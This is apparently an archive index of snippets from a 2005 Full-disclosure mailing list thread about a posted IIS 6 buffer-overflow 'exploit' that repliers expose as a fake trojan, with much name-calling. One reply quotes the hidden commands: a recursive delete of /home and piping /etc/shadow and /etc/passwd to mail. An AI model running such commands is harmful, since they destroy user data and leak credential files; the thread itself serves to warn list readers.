Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Javi Polo
On Apr/20/2005, Day Jay wrote: You are wrong again, it's Smashing the Stick you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Joachim Schipper
On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote: Javi Polo wrote: On Apr/20/2005, Day Jay wrote: You are wrong again, it's Smashing the Stick you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Ron
The ONLY posts I don't like are posts like that, complaining about the list. Like somebody else said, the rest of this list provides great comic relief! Javi Polo wrote: On Apr/20/2005, Day Jay wrote: You are wrong again, it's Smashing the Stick you moron. Not smashing the stack. Ask anyone

[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Day Jay
Sorry, the previous code was broken. This code should work... Happy Owning!! :) =SNIP /* Proof of concept code Please don't send us e-mails asking us how to hack because we will be forced to skullfsck you. DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread dk
Day Jay wrote: Sorry, the previous code was broken. Definitely `borken'... I didn't even see one /etc/passwd file in here! Less obvious calls may catch more habitual FD code runners next time dude. [think: ret=(int *)ret+2;(*ret)=(int)shellcode;] ;-) -- dk

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread James Longstreet
Cute. shellcode = /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe launcher = cat /etc/shadow |mail full-disclosure@lists.grok.org.uk netcat_shell = cat /etc/passwd |mail full-disclosure@lists.grok.org.uk On Wed, 20 Apr 2005, Day Jay wrote: Sorry, the previous code was broken. This code should

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread [EMAIL PROTECTED]
, April 20, 2005 8:15 PM Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken) Sorry, the previous code was broken. This code should work... Happy Owning!! :) =SNIP /* Proof of concept code Please don't send us e-mails asking us

[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Day Jay
Dear DIk, You are thinking local buffer overflows with your think: ret=(int *)ret+2;(*ret)=(int)shellcode; Wow, I think I read smashing the stick for fun and profit a long time ago, but this is a remote root exploit, it's alittle different!! Damn newbie! I mean, how lame are you? --- dk

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread Day Jay
Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken) Sorry, the previous code was broken. This code should work... Happy Owning!! :) =SNIP /* Proof of concept code Please don't send us e